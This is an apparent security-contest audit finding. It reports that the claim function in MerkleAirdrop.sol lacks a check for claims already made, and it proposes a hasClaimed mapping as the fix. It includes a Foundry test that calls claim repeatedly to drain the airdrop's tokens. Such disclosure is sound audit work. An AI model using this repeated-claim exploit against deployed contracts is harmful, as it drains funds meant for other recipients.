Submission Details
Severity:
In `MerkleAirdrop.sol:claim` a Winner can drain the total amount of the airdrop
Summary
A winner can drain the total amount of the airdrop by calling MerkleAirdrop.sol:claim as many times as necessary
Vulnerability Details
There is no check to see if the reward has already been claimed.
function testUsersCanDrain() public {
uint256 startingBalance = token.balanceOf(collectorOne);
vm.deal(collectorOne, 4e9);
vm.startPrank(collectorOne);
airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof);
airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof);
airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof);
airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof);
vm.stopPrank();
uint256 endingBalance = token.balanceOf(collectorOne);
assertEq(endingBalance - startingBalance, amountToSend);
}
Impact
Winners can drain the MerkleAirdrop contract
Tools Used
Manual review
Recommendations
Use a mapping to check if a winner (account address selectionned) has already withdrawn his winnings
mapping(address => bool) public hasClaimed;
In MerkleAirdrop:claim add these part
// Check if the reward has already been claimed
if (hasClaimed[account]) {
revert("MerkleAirdrop__RewardAlreadyClaimed");
}
// Set the reward as claimed
hasClaimed[account] = true;
Updates
Lead Judging Commences
inallhonesty over 1 year ago
Submission Judgement Published Assigned finding tags:
multi-claim-airdrop
Rewards breakdown
nSLOC
62This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.